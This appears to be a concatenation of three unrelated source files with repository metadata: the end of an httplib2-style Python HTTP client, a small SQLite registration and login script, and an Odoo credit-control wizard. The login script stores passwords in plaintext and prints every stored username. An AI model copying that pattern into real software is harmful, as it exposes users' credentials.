conn.connect()
continue
else:
conn.close()
raise
except (socket.error, httplib.HTTPException):
if i < RETRIES-1:
conn.close()
conn.connect()
continue
else:
conn.close()
raise
else:
content = ""
if method == "HEAD":
conn.close()
else:
content = response.read()
response = Response(response)
if method != "HEAD":
content = _decompressContent(response, content)
break
return (response, content)
def _request(self, conn, host, absolute_uri, request_uri, method, body, headers, redirections, cachekey):
"""Do the actual request using the connection object
and also follow one level of redirects if necessary"""
auths = [(auth.depth(request_uri), auth) for auth in self.authorizations if auth.inscope(host, request_uri)]
auth = auths and sorted(auths)[0][1] or None
if auth:
auth.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers)
if auth:
if auth.response(response, body):
auth.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers )
response._stale_digest = 1
if response.status == 401:
for authorization in self._auth_from_challenge(host, request_uri, headers, response, content):
authorization.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers, )
if response.status != 401:
self.authorizations.append(authorization)
authorization.response(response, body)
break
if (self.follow_all_redirects or (method in ["GET", "HEAD"]) or response.status == 303):
if self.follow_redirects and response.status in [300, 301, 302, 303, 307]:
# Pick out the location header and basically start from the beginning
# remembering first to strip the ETag header and decrement our 'depth'
if redirections:
if not response.has_key('location') and response.status != 300:
raise RedirectMissingLocation( _("Redirected but the response is missing a Location: header."), response, content)
# Fix-up relative redirects (which violate an RFC 2616 MUST)
if response.has_key('location'):
location = response['location']
(scheme, authority, path, query, fragment) = parse_uri(location)
if authority == None:
response['location'] = urlparse.urljoin(absolute_uri, location)
if response.status == 301 and method in ["GET", "HEAD"]:
response['-x-permanent-redirect-url'] = response['location']
if not response.has_key('content-location'):
response['content-location'] = absolute_uri
_updateCache(headers, response, content, self.cache, cachekey)
if headers.has_key('if-none-match'):
del headers['if-none-match']
if headers.has_key('if-modified-since'):
del headers['if-modified-since']
if 'authorization' in headers and not self.forward_authorization_headers:
del headers['authorization']
if response.has_key('location'):
location = response['location']
old_response = copy.deepcopy(response)
if not old_response.has_key('content-location'):
old_response['content-location'] = absolute_uri
redirect_method = method
if response.status in [302, 303]:
redirect_method = "GET"
body = None
(response, content) = self.request(
location, method=redirect_method,
body=body, headers=headers,
redirections=redirections - 1)
response.previous = old_response
else:
raise RedirectLimit("Redirected more times than rediection_limit allows.", response, content)
elif response.status in [200, 203] and method in ["GET", "HEAD"]:
# Don't cache 206's since we aren't going to handle byte range requests
if not response.has_key('content-location'):
response['content-location'] = absolute_uri
_updateCache(headers, response, content, self.cache, cachekey)
return (response, content)
def _normalize_headers(self, headers):
return _normalize_headers(headers)
# Need to catch and rebrand some exceptions
# Then need to optionally turn all exceptions into status codes
# including all socket.* and httplib.* exceptions.
def request(self, uri, method="GET", body=None, headers=None, redirections=DEFAULT_MAX_REDIRECTS, connection_type=None):
""" Performs a single HTTP request.
The 'uri' is the URI of the HTTP resource and can begin with either
'http' or 'https'. The value of 'uri' must be an absolute URI.
The 'method' is the HTTP method to perform, such as GET, POST, DELETE,
etc. There is no restriction on the methods allowed.
The 'body' is the entity body to be sent with the request. It is a
string object.
Any extra headers that are to be sent with the request should be
provided in the 'headers' dictionary.
The maximum number of redirect to follow before raising an
exception is 'redirections. The default is 5.
The return value is a tuple of (response, content), the first
being and instance of the 'Response' class, the second being
a string that contains the response entity body.
"""
try:
if headers is None:
headers = {}
else:
headers = self._normalize_headers(headers)
if not headers.has_key('user-agent'):
headers['user-agent'] = "Python-httplib2/%s (gzip)" % __version__
uri = iri2uri(uri)
(scheme, authority, request_uri, defrag_uri) = urlnorm(uri)
domain_port = authority.split(":")[0:2]
if len(domain_port) == 2 and domain_port[1] == '443' and scheme == 'http':
scheme = 'https'
authority = domain_port[0]
proxy_info = self._get_proxy_info(scheme, authority)
conn_key = scheme+":"+authority
if conn_key in self.connections:
conn = self.connections[conn_key]
else:
if not connection_type:
connection_type = SCHEME_TO_CONNECTION[scheme]
certs = list(self.certificates.iter(authority))
if scheme == 'https':
if certs:
conn = self.connections[conn_key] = connection_type(
authority, key_file=certs[0][0],
cert_file=certs[0][1], timeout=self.timeout,
proxy_info=proxy_info,
ca_certs=self.ca_certs,
disable_ssl_certificate_validation=
self.disable_ssl_certificate_validation)
else:
conn = self.connections[conn_key] = connection_type(
authority, timeout=self.timeout,
proxy_info=proxy_info,
ca_certs=self.ca_certs,
disable_ssl_certificate_validation=
self.disable_ssl_certificate_validation)
else:
conn = self.connections[conn_key] = connection_type(
authority, timeout=self.timeout,
proxy_info=proxy_info)
conn.set_debuglevel(debuglevel)
if 'range' not in headers and 'accept-encoding' not in headers:
headers['accept-encoding'] = 'gzip, deflate'
info = email.Message.Message()
cached_value = None
if self.cache:
cachekey = defrag_uri.encode('utf-8')
cached_value = self.cache.get(cachekey)
if cached_value:
# info = email.message_from_string(cached_value)
#
# Need to replace the line above with the kludge below
# to fix the non-existent bug not fixed in this
# bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html
try:
info, content = cached_value.split('\r\n\r\n', 1)
feedparser = email.FeedParser.FeedParser()
feedparser.feed(info)
info = feedparser.close()
feedparser._parse = None
except (IndexError, ValueError):
self.cache.delete(cachekey)
cachekey = None
cached_value = None
else:
cachekey = None
if method in self.optimistic_concurrency_methods and self.cache and info.has_key('etag') and not self.ignore_etag and 'if-match' not in headers:
# http://www.w3.org/1999/04/Editing/
headers['if-match'] = info['etag']
if method not in ["GET", "HEAD"] and self.cache and cachekey:
# RFC 2616 Section 13.10
self.cache.delete(cachekey)
# Check the vary header in the cache to see if this request
# matches what varies in the cache.
if method in ['GET', 'HEAD'] and 'vary' in info:
vary = info['vary']
vary_headers = vary.lower().replace(' ', '').split(',')
for header in vary_headers:
key = '-varied-%s' % header
value = info[key]
if headers.get(header, None) != value:
cached_value = None
break
if cached_value and method in ["GET", "HEAD"] and self.cache and 'range' not in headers:
if info.has_key('-x-permanent-redirect-url'):
# Should cached permanent redirects be counted in our redirection count? For now, yes.
if redirections <= 0:
raise RedirectLimit("Redirected more times than rediection_limit allows.", {}, "")
(response, new_content) = self.request(
info['-x-permanent-redirect-url'], method='GET',
headers=headers, redirections=redirections - 1)
response.previous = Response(info)
response.previous.fromcache = True
else:
# Determine our course of action:
# Is the cached entry fresh or stale?
# Has the client requested a non-cached response?
#
# There seems to be three possible answers:
# 1. [FRESH] Return the cache entry w/o doing a GET
# 2. [STALE] Do the GET (but add in cache validators if available)
# 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request
entry_disposition = _entry_disposition(info, headers)
if entry_disposition == "FRESH":
if not cached_value:
info['status'] = '504'
content = ""
response = Response(info)
if cached_value:
response.fromcache = True
return (response, content)
if entry_disposition == "STALE":
if info.has_key('etag') and not self.ignore_etag and not 'if-none-match' in headers:
headers['if-none-match'] = info['etag']
if info.has_key('last-modified') and not 'last-modified' in headers:
headers['if-modified-since'] = info['last-modified']
elif entry_disposition == "TRANSPARENT":
pass
(response, new_content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
if response.status == 304 and method == "GET":
# Rewrite the cache entry with the new end-to-end headers
# Take all headers that are in response
# and overwrite their values in info.
# unless they are hop-by-hop, or are listed in the connection header.
for key in _get_end2end_headers(response):
info[key] = response[key]
merged_response = Response(info)
if hasattr(response, "_stale_digest"):
merged_response._stale_digest = response._stale_digest
_updateCache(headers, merged_response, content, self.cache, cachekey)
response = merged_response
response.status = 200
response.fromcache = True
elif response.status == 200:
content = new_content
else:
self.cache.delete(cachekey)
content = new_content
else:
cc = _parse_cache_control(headers)
if cc.has_key('only-if-cached'):
info['status'] = '504'
response = Response(info)
content = ""
else:
(response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
except Exception, e:
if self.force_exception_to_status_code:
if isinstance(e, HttpLib2ErrorWithResponse):
response = e.response
content = e.content
response.status = 500
response.reason = str(e)
elif isinstance(e, socket.timeout):
content = "Request Timeout"
response = Response({
"content-type": "text/plain",
"status": "408",
"content-length": len(content)
})
response.reason = "Request Timeout"
else:
content = str(e)
response = Response({
"content-type": "text/plain",
"status": "400",
"content-length": len(content)
})
response.reason = "Bad Request"
else:
raise
return (response, content)
def _get_proxy_info(self, scheme, authority):
"""Return a ProxyInfo instance (or None) based on the scheme
and authority.
"""
hostname, port = urllib.splitport(authority)
proxy_info = self.proxy_info
if callable(proxy_info):
proxy_info = proxy_info(scheme)
if (hasattr(proxy_info, 'applies_to')
and not proxy_info.applies_to(hostname)):
proxy_info = None
return proxy_info
class Response(dict):
"""An object more like email.Message than httplib.HTTPResponse."""
"""Is this response from our local cache"""
fromcache = False
"""HTTP protocol version used by server. 10 for HTTP/1.0, 11 for HTTP/1.1. """
version = 11
"Status code returned by server. "
status = 200
"""Reason phrase returned by server."""
reason = "Ok"
previous = None
def __init__(self, info):
# info is either an email.Message or
# an httplib.HTTPResponse object.
if isinstance(info, httplib.HTTPResponse):
for key, value in info.getheaders():
self[key.lower()] = value
self.status = info.status
self['status'] = str(self.status)
self.reason = info.reason
self.version = info.version
elif isinstance(info, email.Message.Message):
for key, value in info.items():
self[key.lower()] = value
self.status = int(self['status'])
else:
for key, value in info.iteritems():
self[key.lower()] = value
self.status = int(self.get('status', self.status))
self.reason = self.get('reason', self.reason)
def __getattr__(self, name):
if name == 'dict':
return self
else:
raise AttributeError, name
| gpl-3.0 |
AdiPersonalWorks/ATOS_GOM_SystemPrototyping | pytodatabase.py | 1 | 1615 | from os import getenv
import pymssql
import pico
import time
import sqlite3
import datetime
def RegisDB(Username,Pass,email,dept):
#conn = pymssql.connect(host='.\ADITYA', database='SMART')
conn = sqlite3.connect('Databases/SMART.db')
cursor = conn.cursor()
cur_datetime = str(datetime.datetime.now())
usrType = 'Expert'
try:
cursor.execute('INSERT INTO SMART_Registrations (Username, Password, Email, Department, UserAccessLevel, CreatedTime, LastLogin) VALUES (?,?,?,?,?,?,?)',
((Username),(Pass),(email),(dept),(usrType),(cur_datetime),(cur_datetime)))
time.sleep(5)
conn.commit()
time.sleep(5)
conn.close()
return 1
except:
return 0
# Login Validation
def Login_Validate(UID,Pass):
users = []
passwords = []
conn = sqlite3.connect('Databases/SMART.db')
cursor = conn.cursor()
cursor.execute('SELECT Username,Password FROM SMART_Registrations')
all_usernames = cursor.fetchall()
print all_usernames
for user in all_usernames:
users.append(str(user[0]))
passwords.append(str(user[1]))
try:
index = users.index(UID)
print index
if Pass == passwords[index]:
print 'Password matched'
return 1
else:
return 0
except:
#time.sleep(5)
return 0
conn.close()
##message = Login_Validate('adityaexpert','adityaexpert')
##print message
| mit |
vauxoo-dev/account-financial-tools | __unported__/account_credit_control/wizard/credit_control_policy_changer.py | 2 | 7541 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Nicolas Bessi
# Copyright 2014 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.tools.translate import _
from openerp.osv import orm, fields
logger = logging.getLogger(__name__)
class credit_control_policy_changer(orm.TransientModel):
"""Wizard that is run from invoices and allows to set manually a policy
Policy are actually apply to related move lines availabe
in selection widget
"""
_name = "credit.control.policy.changer"
_columns = {
'new_policy_id': fields.many2one('credit.control.policy',
'New Policy to Apply',
required=True),
'new_policy_level_id': fields.many2one('credit.control.policy.level',
'New level to apply',
required=True),
# Only used to provide dynamic filtering on form
'do_nothing': fields.boolean('No follow policy'),
'move_line_ids': fields.many2many('account.move.line',
rel='credit_changer_ml_rel',
string='Move line to change'),
}
def _get_default_lines(self, cr, uid, context=None):
"""Get default lines for fields move_line_ids
of wizard. Only take lines that are on the same account
and move of the invoice and not reconciled
:return: list of compliant move line ids
"""
if context is None:
context = {}
active_ids = context.get('active_ids')
selected_line_ids = []
inv_model = self.pool['account.invoice']
move_line_model = self.pool['account.move.line']
if not active_ids:
return False
# raise ValueError('No active_ids passed in context')
for invoice in inv_model.browse(cr, uid, active_ids, context=context):
if invoice.type in ('in_invoice', 'in_refund', 'out_refund'):
raise orm.except_orm(
_('User error'),
_('Please use wizard on cutomer invoices')
)
domain = [('account_id', '=', invoice.account_id.id),
('move_id', '=', invoice.move_id.id),
('reconcile_id', '=', False)]
move_ids = move_line_model.search(cr, uid, domain, context=context)
selected_line_ids.extend(move_ids)
return selected_line_ids
_defaults = {'move_line_ids': _get_default_lines}
def onchange_policy_id(self, cr, uid, ids, new_policy_id, context=None):
if not new_policy_id:
return {}
policy = self.pool['credit.control.policy'].browse(cr, uid,
new_policy_id,
context=context)
return {'value': {'do_nothing': policy.do_nothing}}
def _mark_as_overridden(self, cr, uid, move_lines, context=None):
"""Mark `move_lines` related credit control line as overridden
This is done by setting manually_overridden fields to True
:param move_lines: move line to mark as overridden
:retun: list of credit line ids that where marked as overridden
"""
credit_model = self.pool['credit.control.line']
domain = [('move_line_id', 'in', [x.id for x in move_lines])]
credits_ids = credit_model.search(cr, uid, domain, context=context)
credit_model.write(cr, uid,
credits_ids,
{'manually_overridden': True},
context)
return credits_ids
def _set_invoice_policy(self, cr, uid, move_line_ids, policy,
context=None):
"""Force policy on invoice"""
invoice_model = self.pool['account.invoice']
invoice_ids = set([x.invoice.id for x in move_line_ids if x.invoice])
invoice_model.write(cr, uid, list(invoice_ids),
{'credit_policy_id': policy.id},
context=context)
def _check_accounts_policies(self, cr, uid, lines, policy, context=None):
policy_obj = self.pool['credit.control.policy']
for line in lines:
policy_obj.check_policy_against_account(
cr, uid,
line.account_id.id,
policy.id,
context=context
)
return True
def set_new_policy(self, cr, uid, wizard_id, context=None):
"""Set new policy on an invoice.
This is done by creating a new credit control line
related to the move line and the policy setted in
the wizard form
:return: ir.actions.act_windows dict
"""
assert len(wizard_id) == 1, "Only one id expected"
wizard_id = wizard_id[0]
credit_line_model = self.pool['credit.control.line']
ir_model = self.pool['ir.model.data']
ui_act_model = self.pool['ir.actions.act_window']
wizard = self.browse(cr, uid, wizard_id, context=context)
controlling_date = fields.date.today()
self._check_accounts_policies(
cr,
uid,
wizard.move_line_ids,
wizard.new_policy_id)
self._mark_as_overridden(
cr,
uid,
wizard.move_line_ids,
context=context
)
# As disscused with business expert
# draft lines should be passed to ignored
# if same level as the new one
# As it is a manual action
# We also ignore rounding tolerance
generated_ids = None
generated_ids = credit_line_model.create_or_update_from_mv_lines(
cr, uid, [],
[x.id for x in wizard.move_line_ids],
wizard.new_policy_level_id.id,
controlling_date,
check_tolerance=False,
context=None
)
self._set_invoice_policy(cr, uid,
wizard.move_line_ids,
wizard.new_policy_id,
context=context)
if not generated_ids:
return {}
view_id = ir_model.get_object_reference(cr, uid,
"account_credit_control",
"credit_control_line_action")
assert view_id, 'No view found'
action = ui_act_model.read(cr, uid, view_id[1], context=context)
action['domain'] = [('id', 'in', generated_ids)]
return action
| agpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.